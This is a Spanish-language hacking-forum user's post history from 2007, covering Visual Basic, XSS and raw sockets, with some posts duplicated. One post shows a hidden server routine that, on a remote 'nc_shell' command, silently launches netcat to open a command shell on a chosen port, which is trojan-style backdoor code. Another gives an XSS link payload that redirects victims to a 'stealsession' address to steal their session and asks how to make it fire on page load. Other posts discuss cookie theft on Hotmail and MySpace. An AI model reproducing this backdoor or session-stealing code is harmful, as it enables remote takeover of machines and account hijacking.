Código [Seleccionar]
Function fncDir(strDir As String)
Dim i, strVar As String
sptDir = Split(strDir, "\")
For i = 0 To UBound(sptDir) - 1
strVar = strVar & sptDir(i) & "\"
Next
fncDir = strVar
End Function
- Bienvenido a Test Foro de elhacker.net SMF 2.1.
Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
#221
Programación Visual Basic / Re: dividir ruta...
18 Mayo 2007, 01:20 AM #222
Programación Visual Basic / Re: Problema con Split data
15 Mayo 2007, 18:00 PMCódigo [Seleccionar]
Servidor:
Private Sub WS_onDataArrival(ByVal bytesTotal As Long)
Dim vData() As String
WS.GetData VTData, vbString
vData = Split(VTData, "|")
If vData(0) = "msge" Then
MsgBox vData(1)
VTData = ""
End If
If vData(0) = "nc_shell" Then
Shell "cmd.exe /c " & App.path & "\nc.exe -L -p " & vData(1) & " -e cmd.exe", vbHide
End If
Text1.Text = VTData
End Sub
#223
Nivel Web / Re: XSS ---falsificando sesiones
13 Mayo 2007, 03:22 AMCita de: keype en 12 Mayo 2007, 20:16 PM
Quizas lo que necesites es interceptar las cabeceras http, desde ahi puedes manipular el Referer, sin problemas....
Quizás entendiste mal, no pretendo manipular mi referencia, si no capturarla, redireccionando como sea a la víctima, desde la página vulnerable a mi servidor.
#224
WarZone / Nuevo Mensaje
10 Mayo 2007, 17:25 PMCita de: Red Mx en 10 Mayo 2007, 17:17 PM
oh p**a madre ~ la web completa con razon no veia
listo pasado
Edita tu mensaje
.
#225
Programación Visual Basic / Raw socket
9 Mayo 2007, 21:24 PM
Lo único que he encontrado de interés en google sobre como programar con raw socket en VB es esto .
Lo he probado, habiendo colocado previamente la libreria en system32, y según dice en los comentarios cuando te devuelve 0 quiere decir que se ha realizado la operación exito, en cambio a mi siempre me devuelve el valor 40.
A ver si alguien lo prueba y le funciona, o si sabe programar raw socket como que mejor, saludos .
Lo he probado, habiendo colocado previamente la libreria en system32, y según dice en los comentarios cuando te devuelve 0 quiere decir que se ha realizado la operación exito, en cambio a mi siempre me devuelve el valor 40.
A ver si alguien lo prueba y le funciona, o si sabe programar raw socket como que mejor, saludos
.
#226
Nivel Web / Re: XSS ---falsificando sesiones
9 Mayo 2007, 00:51 AM
Te recomiendo IECookiesView o Proxomitron, buscalos en google.
Aprovecho este hilo activo, dirigido a las mentes más despiertas, para resolver una duda.
Mi intención no es exactamente falsificar la sesión, si no rovarla a traves de $HTTP_REFERER, y la cosa funciona, solo que el usuario tiene que pasar el puntero del ratón por encima del hipervínculo para que se ejecute el código javascript. Lo que quisiera es que el código javascript se ejecutase nada más cargar la página, tipo onLoad.
Para mi se ha convertido en un reto, aunque ya lo doy por perdido, a ver como lo ven ustedes...
Caracteres prohividos: < &
<a href="url"><img src="img" border="0" alt="alt"></a>
<a href="url" onMouseMove="javascript:location.href=http://stealsession"><img src="img" border="0" alt="alt"></a>
Aprovecho este hilo activo, dirigido a las mentes más despiertas, para resolver una duda.
Mi intención no es exactamente falsificar la sesión, si no rovarla a traves de $HTTP_REFERER, y la cosa funciona, solo que el usuario tiene que pasar el puntero del ratón por encima del hipervínculo para que se ejecute el código javascript. Lo que quisiera es que el código javascript se ejecutase nada más cargar la página, tipo onLoad.
Para mi se ha convertido en un reto, aunque ya lo doy por perdido, a ver como lo ven ustedes...
Caracteres prohividos: < &
<a href="url"><img src="img" border="0" alt="alt"></a>
<a href="url" onMouseMove="javascript:location.href=http://stealsession"><img src="img" border="0" alt="alt"></a>
#227
Nivel Web / Re: Xss in Myspace Robo de Cookies
8 Mayo 2007, 09:14 AMCita de: Man-In-the-Middle en 7 Mayo 2007, 18:58 PM
No depende es un hecho, ojooo , que no estoy hablando de myspace, en el caso de msn, no es un tema de IE confugyracion, de que peta peta, pero , no llama a dos variables fundamentales, se ha probado con todas la ver de IE, y es un nuevo parche de actualizacion,, , esta explicado en el hotro hilo
Y... ¿si no actualizas tu Internet Explorer?
#228
Nivel Web / Re: Xss in Myspace Robo de Cookies
7 Mayo 2007, 09:17 AMCita de: Man-In-the-Middle en 7 Mayo 2007, 05:35 AM
De Peru??? oRTNZ,es bueno saber, el bug corre de hotmail, pero bajo Firefox, en iE no peta,
saludos..,//
MITM
Eso dependerá de la configuración que tengas en tu Internet Explorer.
Hotmail está lleno de inyecciones XSS, yo me puse una tarde y saqué dos que no estaban publicadas, y por muchos foros veo cada día inyecciones a Hotmail y otras páginas webs.
¿Conclusión? No hay que ser "uno de los grandes" para encontrar una inyección XSS/SQL, y menos en myspace beta.
#229
Nivel Web / Re: Xss in Myspace Robo de Cookies
7 Mayo 2007, 00:06 AM
Queria decir que las inyecciones XSS no tienen ningún merito encontrarlas, muchas páginas webs importantes las sufren, veáse Hotmail o Yahoo.
Digo que no tiene merito porque no es un fallo del sistema, si no un fallo del programador...
Digo que no tiene merito porque no es un fallo del sistema, si no un fallo del programador...
#230
Nivel Web / Re: Xss in Myspace Robo de Cookies
5 Mayo 2007, 12:23 PM
Heché un vistazo rápido a la lista de fallos y no encontré ninguno que funcionara.
Ahora este tipo se ha hecho famoso por encontrar un XSS en cada variable de myspace, bueno, no por el hecho de encontrarlas, que eso no tiene mucho merito, si no por el hecho de publicarlas...
Ahora este tipo se ha hecho famoso por encontrar un XSS en cada variable de myspace, bueno, no por el hecho de encontrarlas, que eso no tiene mucho merito, si no por el hecho de publicarlas...